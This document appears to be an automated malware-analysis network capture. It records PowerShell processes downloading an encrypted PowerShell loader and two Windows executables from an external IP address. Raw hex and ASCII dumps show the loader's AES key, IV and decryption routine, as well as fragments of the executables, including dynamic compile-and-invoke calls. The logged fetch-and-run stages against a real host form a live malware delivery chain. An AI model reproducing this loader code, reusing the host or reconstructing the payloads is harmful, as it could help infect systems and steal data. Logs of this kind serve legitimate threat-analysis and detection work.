                                                          Data Ascii: dFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbUFMRUVJQVp3NTNEbG9OQV
                                                          Dec 24, 2024 02:18:15.890808105 CET1236INData Raw: 4e 00 6a 00 55 00 6c 00 6c 00 6f 00 51 00 6c 00 52 00 46 00 56 00 56 00 5a 00 50 00 55 00 57 00 74 00 52 00 55 00 56 00 6c 00 46 00 53 00 6d 00 5a 00 45 00 52 00 55 00 70 00 44 00 51 00 55 00 56 00 4e 00 56 00 46 00 6c 00 42 00 5a 00 45 00 56 00
                                                          Data Ascii: NjUlloQlRFVVZPUWtRUVlFSmZERUpDQUVNVFlBZEVUaFlMREVKVlpCZFFCRk1RTVY4UFkwNFdFRk1FUWw4YmNrSlVHMElIRVdRUVp3WWZXVHRvUWhaVkpoSkVD
                                                          Dec 24, 2024 02:18:16.220746994 CET156OUTGET /infopage/inbg.exe HTTP/1.1
                                                          X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                          Host: 147.45.44.131
                                                          Dec 24, 2024 02:18:16.621664047 CET1236INHTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:16 GMT
                                                          Server: Apache/2.4.52 (Ubuntu)
                                                          Last-Modified: Sun, 22 Dec 2024 14:07:09 GMT
                                                          ETag: "49c00-629dc654be596"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 302080
                                                          Content-Type: application/x-msdos-program
                                                          Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ac 00 00 00 00 00 00 50 88 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bf 1b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 88 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 1d [TRUNCATED]
                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL<_gP@`@ 8.text6 `.rdata "@@.data0P@.reloc8 :b@B


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.849708147.45.44.131805656C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 24, 2024 02:18:15.789781094 CET275OUTGET /infopage/ybfh.ps1 HTTP/1.1
                                                          X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                          Host: 147.45.44.131
                                                          Connection: Keep-Alive
                                                          Dec 24, 2024 02:18:17.040525913 CET1236INHTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:16 GMT
                                                          Server: Apache/2.4.52 (Ubuntu)
                                                          Last-Modified: Sun, 22 Dec 2024 15:01:38 GMT
                                                          ETag: "732-629dd28283c2c"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 1842
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive
                                                          Data Raw: 0d 0a 24 69 6f 50 51 70 6d 53 73 51 76 20 3d 20 27 72 35 4b 77 4d 4c 67 45 69 6f 33 63 6d 48 36 4a 64 59 51 72 70 37 6a 6b 78 6d 41 34 72 73 4e 33 63 70 4b 4a 69 6f 4b 6c 33 2f 6b 3d 27 0d 0a 24 57 43 45 62 47 5a 4b 35 65 42 20 3d 20 27 44 4e 45 36 41 52 55 59 57 58 76 4c 6d 54 6d 2f 48 77 77 52 68 77 3d 3d 27 0d 0a 24 43 79 72 78 6d 61 55 4f 41 32 20 3d 20 27 76 6f 6e 5a 31 74 6b 44 69 30 76 35 77 77 52 4f 6a 43 35 54 41 71 49 37 57 4a 52 72 31 39 51 6b 74 34 44 59 6f 6e 32 37 6d 62 67 41 4b 6f 75 73 49 62 51 6a 70 43 6e 32 73 38 79 2f 33 44 4f 47 63 32 73 50 65 6e 49 33 6e 2b 34 75 50 45 6f 2f 4b 6e 36 4b 48 74 61 54 4b 30 70 34 37 71 36 56 37 53 36 5a 4d 69 53 64 76 6a 75 42 51 51 39 52 70 4b 69 7a 6d 6d 2b 6b 4e 52 63 6b 50 4e 52 43 53 62 2f 76 77 4d 36 71 54 57 59 69 2f 33 54 38 65 44 35 44 33 33 30 44 35 2f 73 36 65 6b 44 49 32 32 74 68 6a 4d 55 70 48 43 4a 50 64 48 74 64 4c 33 53 65 62 6e 70 64 73 47 56 71 72 61 6e 56 32 38 32 64 57 65 72 67 54 64 6a 55 49 63 46 61 6a 55 31 64 73 66 2f 6e 69 [TRUNCATED]
                                                          Data Ascii: $ioPQpmSsQv = 'r5KwMLgEio3cmH6JdYQrp7jkxmA4rsN3cpKJioKl3/k='$WCEbGZK5eB = 'DNE6ARUYWXvLmTm/HwwRhw=='$CyrxmaUOA2 = 'vonZ1tkDi0v5wwROjC5TAqI7WJRr19Qkt4DYon27mbgAKousIbQjpCn2s8y/3DOGc2sPenI3n+4uPEo/Kn6KHtaTK0p47q6V7S6ZMiSdvjuBQQ9RpKizmm+kNRckPNRCSb/vwM6qTWYi/3T8eD5D330D5/s6ekDI22thjMUpHCJPdHtdL3SebnpdsGVqranV282dWergTdjUIcFajU1dsf/niogfdmth46rEOH5t5XFH+VBH5RH61SqZli1pn0Uv3xaTU2CHqQJOzapCD7QzltSUHpdV4SQc6o2W8qssurm0xLUSLDVWKXHUUjVxo2CC0zke/lAWyh4djJzxh/Yk6UHkyFe4N3mqLeUfQMIyxiTFRDb8MMto1LcSrijzdYfd1yV7xAR3efP1TkRvR9QCQwA89KvAcJmso8SGo6HQJ9un7QcyXBENpWnOOkkrHOWJJmB3vELr40OSYs5FeLDIL8fflJhrQ7KAL/a5hHSd5PuW+n+pnJ7em+Sj6ehLQRGHwRN0cAEdjInGTE0HbPY6PveHgQ9CxIl9Tc03lt+ho8wGOTezgJHPmVtYEjU8cno7ttnI6ySzMhdhzWnndRp9+LQvGBgQXLXt0pFfEwpf4zQ='function avtIDt48Cb ($p7hxeaS5g2, $ioPQpmSsQv, $WCEbGZK5eB) { $cTaSLj6r0V = [Convert]::FromBase64String($ioPQpmSsQv) $F1V1q6ulZs = [Convert]::FromBase64String($WCEbGZK5eB) $vY3h0Tbp6I = [Convert]::FromBase64String(
                                                          Dec 24, 2024 02:18:17.040724993 CET867INData Raw: 24 70 37 68 78 65 61 53 35 67 32 29 0d 0a 20 20 20 20 24 61 51 68 58 42 69 7a 52 41 78 20 3d 20 5b 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 2e 41 65 73 5d 3a 3a 43 72 65 61 74 65 28 29 0d 0a 20 20 20 20
                                                          Data Ascii: $p7hxeaS5g2) $aQhXBizRAx = [System.Security.Cryptography.Aes]::Create() $aQhXBizRAx.Key = $cTaSLj6r0V $aQhXBizRAx.IV = $F1V1q6ulZs $aQhXBizRAx.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7 $gBOWS1t7hT = $
                                                          Dec 24, 2024 02:18:17.110922098 CET156OUTGET /infopage/oung.exe HTTP/1.1
                                                          X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                          Host: 147.45.44.131
                                                          Dec 24, 2024 02:18:17.508258104 CET1236INHTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:17 GMT
                                                          Server: Apache/2.4.52 (Ubuntu)
                                                          Last-Modified: Sun, 22 Dec 2024 14:24:51 GMT
                                                          ETag: "ae00-629dca4a1509c"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 44544
                                                          Content-Type: application/x-msdos-program
                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 59 ad 84 94 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 a4 00 00 00 08 00 00 00 00 00 00 fe c2 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ac c2 00 00 4f 00 00 00 00 e0 00 00 ec 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 90 c2 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELY"0 @ `O H.text `.rsrc@@.reloc@BHx"0S(rp(o(r3p(os%oo~o~(*(*0(rp(o(~((osso(rp(oo&o(r-p(oo&o%oo(rWp(oo(rqp(oo%%o &*(*0HiY(!o" +%o#
                                                          Dec 24, 2024 02:18:17.508502007 CET1236INData Raw: 00 0a 5d 13 04 08 09 02 09 91 02 02 8e 69 17 59 91 1f 70 61 61 07 11 04 91 61 d2 9c 09 17 58 0d 09 06 32 d7 08 2a 1e 02 28 16 00 00 0a 2a 1a 28 01 00 00 06 2a 1e 02 28 16 00 00 0a 2a 1e 02 28 16 00 00 0a 2a 00 13 30 02 00 4c 00 00 00 00 00 00 00
                                                          Data Ascii: ]iYpaaaX2*(*(*(*(*0L(rp(o(rp(o(rp(o*BSJBv4.0.30319l#~#Strings#US|#
                                                          Dec 24, 2024 02:18:17.508522987 CET1236INData Raw: 6c 6c 65 63 74 69 6f 6e 73 2e 53 70 65 63 69 61 6c 69 7a 65 64 00 47 65 74 4d 65 74 68 6f 64 00 43 6f 6d 70 69 6c 65 41 73 73 65 6d 62 6c 79 46 72 6f 6d 53 6f 75 72 63 65 00 67 65 74 5f 42 69 67 45 6e 64 69 61 6e 55 6e 69 63 6f 64 65 00 49 6e 76
                                                          Data Ascii: llections.SpecializedGetMethodCompileAssemblyFromSourceget_BigEndianUnicodeInvokeGetTypeMethodBaseGuidAttributeDebuggableAttributeComVisibleAttributeAssemblyTitleAttributeAssemblyTrademarkAttributeTargetFrameworkAttributeAssemblyF
                                                          Dec 24, 2024 02:18:17.509275913 CET1236INData Raw: 00 74 00 62 00 32 00 4a 00 4b 00 4d 00 6c 00 6c 00 53 00 65 00 57 00 38 00 79 00 63 00 6d 00 70 00 4f 00 5a 00 32 00 35 00 57 00 52 00 47 00 68 00 4b 00 64 00 6d 00 56 00 32 00 54 00 6a 00 68 00 53 00 4d 00 6d 00 74 00 31 00 4f 00 47 00 39 00 51
                                                          Data Ascii: tb2JKMllSeW8ycmpOZ25WRGhKdmV2TjhSMmt1OG9QQ0JvbmhtcHpGYjJHWXFQaUxoSnE=RjBVY2FBVVdNVThSRmxNWVBXODhGMFVMREZGVlZSdEZGbE1QVE
                                                          Dec 24, 2024 02:18:17.509294033 CET1236INData Raw: 4a 00 5a 00 4d 00 6d 00 46 00 52 00 65 00 45 00 46 00 43 00 4d 00 46 00 46 00 58 00 54 00 6d 00 78 00 72 00 4f 00 47 00 46 00 43 00 57 00 55 00 5a 00 56 00 51 00 6a 00 52 00 42 00 52 00 7a 00 42 00 4a 00 55 00 56 00 68 00 55 00 4f 00 46 00 64 00
                                                          Data Ascii: JZMmFReEFCMFFXTmxrOGFCWUZVQjRBRzBJUVhUOFdGRmNPRjFOWkpndFlGaFlSRmxjSGNpdFlCbE1hU3p0L0prSVdRazF2YUJaVkprSVdRaFpDRUZNQmN4QllR
                                                          Dec 24, 2024 02:18:17.510149956 CET1236INData Raw: 65 00 6e 00 52 00 76 00 55 00 57 00 68 00 61 00 56 00 6b 00 70 00 72 00 53 00 56 00 64 00 52 00 61 00 46 00 6c 00 61 00 59 00 6e 00 70 00 34 00 56 00 6b 00 70 00 72 00 53 00 56 00 64 00 52 00 61 00 46 00 70 00 44 00 55 00 57 00 68 00 61 00 56 00
                                                          Data Ascii: enRvUWhaVkprSVdRaFlaYnp4VkprSVdRaFpDUWhaVkprSVVDVk1RREZNWk5WQVVUanRvUWhaVkprSVdRaFpDUWhaVkpBeENCbG9PUUJwNERFSVdRaFpDUWhaVk
                                                          Dec 24, 2024 02:18:17.510163069 CET744INData Raw: 46 00 42 00 4f 00 56 00 68 00 46 00 62 00 55 00 46 00 4d 00 51 00 6a 00 42 00 46 00 4e 00 6c 00 6c 00 45 00 52 00 6c 00 52 00 42 00 56 00 55 00 6c 00 4d 00 52 00 46 00 5a 00 6f 00 57 00 45 00 74 00 74 00 4f 00 44 00 68 00 52 00 61 00 46 00 70 00
                                                          Data Ascii: FBOVhFbUFMQjBFNllERlRBVUlMRFZoWEttODhRaFpDUWhaVkprSVdRaFpDUUhVSFl3TkNCMllRRFZVUWRSRjNRRHRvUWhaVkprSVdRaFlmV1R0L0prSVdRa3R2
                                                          Dec 24, 2024 02:18:17.511027098 CET1236INData Raw: 46 00 57 00 62 00 55 00 6c 00 4c 00 52 00 55 00 5a 00 4e 00 56 00 56 00 6c 00 70 00 52 00 6c 00 70 00 45 00 52 00 55 00 6c 00 49 00 52 00 32 00 74 00 4a 00 65 00 46 00 6c 00 33 00 4e 00 56 00 52 00 43 00 56 00 6d 00 4e 00 58 00 51 00 6e 00 67 00
                                                          Data Ascii: FWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJ
                                                          Dec 24, 2024 02:18:17.511039972 CET1236INData Raw: 54 00 6c 00 46 00 6e 00 5a 00 47 00 46 00 43 00 4d 00 55 00 56 00 45 00 52 00 6d 00 78 00 4f 00 5a 00 46 00 52 00 33 00 65 00 45 00 4e 00 4e 00 61 00 30 00 6c 00 52 00 55 00 57 00 77 00 30 00 56 00 57 00 46 00 42 00 57 00 6d 00 46 00 43 00 65 00
                                                          Data Ascii: TlFnZGFCMUVERmxOZFR3eENNa0lRUWw0VWFBWmFCeHBDQzFnQkpnTlNCa1FIRVVWWkpndFlGaFlPQjFnU2Nnb2FRbDhNRmhZQmZ4SlRUaFlMREVKVmRoQlpGbE
                                                          Dec 24, 2024 02:18:17.516563892 CET1236INData Raw: 46 00 45 00 52 00 6d 00 78 00 4f 00 56 00 6c 00 6c 00 6e 00 5a 00 47 00 46 00 43 00 4d 00 55 00 56 00 45 00 52 00 6d 00 78 00 4f 00 56 00 6d 00 4a 00 33 00 65 00 45 00 4e 00 52 00 62 00 55 00 31 00 4e 00 52 00 44 00 46 00 6a 00 52 00 6c 00 56 00
                                                          Data Ascii: FERmxOVllnZGFCMUVERmxOVmJ3eENRbU1NRDFjRlVBdFRGWGtFTVZNV2NndFpESElIRGxNU1p4WlRTbjhNRm1ZQmRFSkdFRmtCQjBVR0trSmZERUpDQUZjR1l5
                                                          Dec 24, 2024 02:18:18.095757961 CET156OUTGET /infopage/inbg.exe HTTP/1.1
                                                          X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                          Host: 147.45.44.131
                                                          Dec 24, 2024 02:18:18.492990971 CET1236INHTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:18 GMT
                                                          Server: Apache/2.4.52 (Ubuntu)
                                                          Last-Modified: Sun, 22 Dec 2024 14:07:09 GMT
                                                          ETag: "49c00-629dc654be596"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 302080
                                                          Content-Type: application/x-msdos-program
                                                          Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ac 00 00 00 00 00 00 50 88 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bf 1b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 88 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 1d [TRUNCATED]
                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL<_gP@`@ 8.text6 `.rdata "@@.data0P@.reloc8 :b@B


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.849711147.45.44.131803352C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 24, 2024 02:18:19.362927914 CET275OUTGET /infopage/ybfh.ps1 HTTP/1.1
                                                          X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                          Host: 147.45.44.131
                                                          Connection: Keep-Alive
                                                          Dec 24, 2024 02:18:20.609555960 CET1236INHTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:20 GMT
                                                          Server: Apache/2.4.52 (Ubuntu)
                                                          Last-Modified: Sun, 22 Dec 2024 15:01:38 GMT
                                                          ETag: "732-629dd28283c2c"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 1842
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive
                                                          Data Raw: 0d 0a 24 69 6f 50 51 70 6d 53 73 51 76 20 3d 20 27 72 35 4b 77 4d 4c 67 45 69 6f 33 63 6d 48 36 4a 64 59 51 72 70 37 6a 6b 78 6d 41 34 72 73 4e 33 63 70 4b 4a 69 6f 4b 6c 33 2f 6b 3d 27 0d 0a 24 57 43 45 62 47 5a 4b 35 65 42 20 3d 20 27 44 4e 45 36 41 52 55 59 57 58 76 4c 6d 54 6d 2f 48 77 77 52 68 77 3d 3d 27 0d 0a 24 43 79 72 78 6d 61 55 4f 41 32 20 3d 20 27 76 6f 6e 5a 31 74 6b 44 69 30 76 35 77 77 52 4f 6a 43 35 54 41 71 49 37 57 4a 52 72 31 39 51 6b 74 34 44 59 6f 6e 32 37 6d 62 67 41 4b 6f 75 73 49 62 51 6a 70 43 6e 32 73 38 79 2f 33 44 4f 47 63 32 73 50 65 6e 49 33 6e 2b 34 75 50 45 6f 2f 4b 6e 36 4b 48 74 61 54 4b 30 70 34 37 71 36 56 37 53 36 5a 4d 69 53 64 76 6a 75 42 51 51 39 52 70 4b 69 7a 6d 6d 2b 6b 4e 52 63 6b 50 4e 52 43 53 62 2f 76 77 4d 36 71 54 57 59 69 2f 33 54 38 65 44 35 44 33 33 30 44 35 2f 73 36 65 6b 44 49 32 32 74 68 6a 4d 55 70 48 43 4a 50 64 48 74 64 4c 33 53 65 62 6e 70 64 73 47 56 71 72 61 6e 56 32 38 32 64 57 65 72 67 54 64 6a 55 49 63 46 61 6a 55 31 64 73 66 2f 6e 69 [TRUNCATED]
                                                          Data Ascii: $ioPQpmSsQv = 'r5KwMLgEio3cmH6JdYQrp7jkxmA4rsN3cpKJioKl3/k='$WCEbGZK5eB = 'DNE6ARUYWXvLmTm/HwwRhw=='$CyrxmaUOA2 = 'vonZ1tkDi0v5wwROjC5TAqI7WJRr19Qkt4DYon27mbgAKousIbQjpCn2s8y/3DOGc2sPenI3n+4uPEo/Kn6KHtaTK0p47q6V7S6ZMiSdvjuBQQ9RpKizmm+kNRckPNRCSb/vwM6qTWYi/3T8eD5D330D5/s6ekDI22thjMUpHCJPdHtdL3SebnpdsGVqranV282dWergTdjUIcFajU1dsf/niogfdmth46rEOH5t5XFH+VBH5RH61SqZli1pn0Uv3xaTU2CHqQJOzapCD7QzltSUHpdV4SQc6o2W8qssurm0xLUSLDVWKXHUUjVxo2CC0zke/lAWyh4djJzxh/Yk6UHkyFe4N3mqLeUfQMIyxiTFRDb8MMto1LcSrijzdYfd1yV7xAR3efP1TkRvR9QCQwA89KvAcJmso8SGo6HQJ9un7QcyXBENpWnOOkkrHOWJJmB3vELr40OSYs5FeLDIL8fflJhrQ7KAL/a5hHSd5PuW+n+pnJ7em+Sj6ehLQRGHwRN0cAEdjInGTE0HbPY6PveHgQ9CxIl9Tc03lt+ho8wGOTezgJHPmVtYEjU8cno7ttnI6ySzMhdhzWnndRp9+LQvGBgQXLXt0pFfEwpf4zQ='function avtIDt48Cb ($p7hxeaS5g2, $ioPQpmSsQv, $WCEbGZK5eB) { $cTaSLj6r0V = [Convert]::FromBase64String($ioPQpmSsQv) $F1V1q6ulZs = [Convert]::FromBase64String($WCEbGZK5eB) $vY3h0Tbp6I = [Convert]::FromBase64String(
                                                          Dec 24, 2024 02:18:20.609700918 CET867INData Raw: 24 70 37 68 78 65 61 53 35 67 32 29 0d 0a 20 20 20 20 24 61 51 68 58 42 69 7a 52 41 78 20 3d 20 5b 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 2e 41 65 73 5d 3a 3a 43 72 65 61 74 65 28 29 0d 0a 20 20 20 20
                                                          Data Ascii: $p7hxeaS5g2) $aQhXBizRAx = [System.Security.Cryptography.Aes]::Create() $aQhXBizRAx.Key = $cTaSLj6r0V $aQhXBizRAx.IV = $F1V1q6ulZs $aQhXBizRAx.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7 $gBOWS1t7hT = $
                                                          Dec 24, 2024 02:18:21.301177979 CET156OUTGET /infopage/oung.exe HTTP/1.1
                                                          X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                          Host: 147.45.44.131
                                                          Dec 24, 2024 02:18:21.702497005 CET1236INHTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:21 GMT
                                                          Server: Apache/2.4.52 (Ubuntu)
                                                          Last-Modified: Sun, 22 Dec 2024 14:24:51 GMT
                                                          ETag: "ae00-629dca4a1509c"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 44544
                                                          Content-Type: application/x-msdos-program
                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 59 ad 84 94 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 a4 00 00 00 08 00 00 00 00 00 00 fe c2 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ac c2 00 00 4f 00 00 00 00 e0 00 00 ec 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 90 c2 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELY"0 @ `O H.text `.rsrc@@.reloc@BHx"0S(rp(o(r3p(os%oo~o~(*(*0(rp(o(~((osso(rp(oo&o(r-p(oo&o%oo(rWp(oo(rqp(oo%%o &*(*0HiY(!o" +%o#
                                                          Dec 24, 2024 02:18:21.702708960 CET1236INData Raw: 00 0a 5d 13 04 08 09 02 09 91 02 02 8e 69 17 59 91 1f 70 61 61 07 11 04 91 61 d2 9c 09 17 58 0d 09 06 32 d7 08 2a 1e 02 28 16 00 00 0a 2a 1a 28 01 00 00 06 2a 1e 02 28 16 00 00 0a 2a 1e 02 28 16 00 00 0a 2a 00 13 30 02 00 4c 00 00 00 00 00 00 00
                                                          Data Ascii: ]iYpaaaX2*(*(*(*(*0L(rp(o(rp(o(rp(o*BSJBv4.0.30319l#~#Strings#US|#
                                                          Dec 24, 2024 02:18:21.702721119 CET1236INData Raw: 6c 6c 65 63 74 69 6f 6e 73 2e 53 70 65 63 69 61 6c 69 7a 65 64 00 47 65 74 4d 65 74 68 6f 64 00 43 6f 6d 70 69 6c 65 41 73 73 65 6d 62 6c 79 46 72 6f 6d 53 6f 75 72 63 65 00 67 65 74 5f 42 69 67 45 6e 64 69 61 6e 55 6e 69 63 6f 64 65 00 49 6e 76
                                                          Data Ascii: llections.SpecializedGetMethodCompileAssemblyFromSourceget_BigEndianUnicodeInvokeGetTypeMethodBaseGuidAttributeDebuggableAttributeComVisibleAttributeAssemblyTitleAttributeAssemblyTrademarkAttributeTargetFrameworkAttributeAssemblyF
                                                          Dec 24, 2024 02:18:21.703495979 CET1236INData Raw: 00 74 00 62 00 32 00 4a 00 4b 00 4d 00 6c 00 6c 00 53 00 65 00 57 00 38 00 79 00 63 00 6d 00 70 00 4f 00 5a 00 32 00 35 00 57 00 52 00 47 00 68 00 4b 00 64 00 6d 00 56 00 32 00 54 00 6a 00 68 00 53 00 4d 00 6d 00 74 00 31 00 4f 00 47 00 39 00 51
                                                          Data Ascii: tb2JKMllSeW8ycmpOZ25WRGhKdmV2TjhSMmt1OG9QQ0JvbmhtcHpGYjJHWXFQaUxoSnE=RjBVY2FBVVdNVThSRmxNWVBXODhGMFVMREZGVlZSdEZGbE1QVE
                                                          Dec 24, 2024 02:18:21.703506947 CET1236INData Raw: 4a 00 5a 00 4d 00 6d 00 46 00 52 00 65 00 45 00 46 00 43 00 4d 00 46 00 46 00 58 00 54 00 6d 00 78 00 72 00 4f 00 47 00 46 00 43 00 57 00 55 00 5a 00 56 00 51 00 6a 00 52 00 42 00 52 00 7a 00 42 00 4a 00 55 00 56 00 68 00 55 00 4f 00 46 00 64 00
                                                          Data Ascii: JZMmFReEFCMFFXTmxrOGFCWUZVQjRBRzBJUVhUOFdGRmNPRjFOWkpndFlGaFlSRmxjSGNpdFlCbE1hU3p0L0prSVdRazF2YUJaVkprSVdRaFpDRUZNQmN4QllR
